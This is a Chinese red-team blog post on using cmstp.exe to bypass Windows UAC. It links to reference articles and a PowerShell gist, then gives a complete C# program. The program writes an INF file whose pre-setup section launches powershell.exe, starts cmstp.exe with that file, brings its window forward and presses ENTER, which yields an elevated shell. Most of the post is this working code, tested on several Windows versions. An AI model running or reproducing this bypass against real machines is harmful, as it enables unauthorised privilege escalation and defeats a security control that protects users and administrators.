cmstp bypassuac研究

红队

创建时间:2021-03-04 20:58

阅读:

参考链接:
https://www.anquanke.com/post/id/86685
https://mp.weixin.qq.com/s/dhh73wWhbo_dfYN-oBDW6g

对应的powershell脚本:

https://gist.github.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1#file-uacbypasscmstp-ps1

测试系统：

* windows 10
* windows 7
* windows server 2012
* windows server 2008

C#改造

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.IO;
using System.Threading.Tasks;
namespace cmstp_bypassuac
{
    class Program
    {
        [DllImport("user32.dll", SetLastError = true)]
        public static extern bool SetForegroundWindow(IntPtr hWnd);
        public static string createinf() {
            string filename = "test.inf";
            string command = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";
            string data = @"[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
{0}
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"",  ""ProfileInstallPath"", "" % UnexpectedError % "", """"
    [Strings]
ServiceName = ""CorpVPN""
ShortSvcName = ""CorpVPN";
            data = string.Format(data, command);
            File.WriteAllText(filename, data);
            if (File.Exists(filename))
            {
                Console.WriteLine("Create Inf File is ok");
                var currentpath = System.IO.Directory.GetCurrentDirectory() +  "\\"+filename;
                return currentpath;
            }
            else {
                Console.WriteLine("Create Inf File Failure...");
                return "";
            }

        }
        public static IntPtr execute() {
            Process[] cmstpdata = Process.GetProcessesByName("cmstp"); //获取CMSTP线程
            if (cmstpdata.Length != 0)
            {
                cmstpdata[0].Refresh();
                var windowhandle = cmstpdata[0].MainWindowHandle;
                return windowhandle;
            }
            else
            {
                Console.WriteLine("Not Found cmstp handle,exit....");
                return IntPtr.Zero;
            }
        }
        static void Main(string[] args)
        {
            string infpath=createinf();
            if (infpath.Length != 0)
            {
                ProcessStartInfo runcmd =new  ProcessStartInfo("C:\\Windows\\System32\\cmstp.exe");
                runcmd.Arguments = "/au \""+infpath+"\"";
                runcmd.UseShellExecute = false;
                Process.Start(runcmd);
                IntPtr windowhandle = execute();
                //由于刚刚cmstp进程刚刚创建无法快速获取对应的窗口句柄，使用循环来解决
                while (windowhandle == IntPtr.Zero) {
                    windowhandle = execute();
                }
                Console.WriteLine("The Cmstp Handle:" + windowhandle);
                SetForegroundWindow(windowhandle); //将CMSTP窗口调出到前台并激活该窗口
                SendKeys.SendWait("{ENTER}");    
            }
        }   
    }
}

效果如下

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。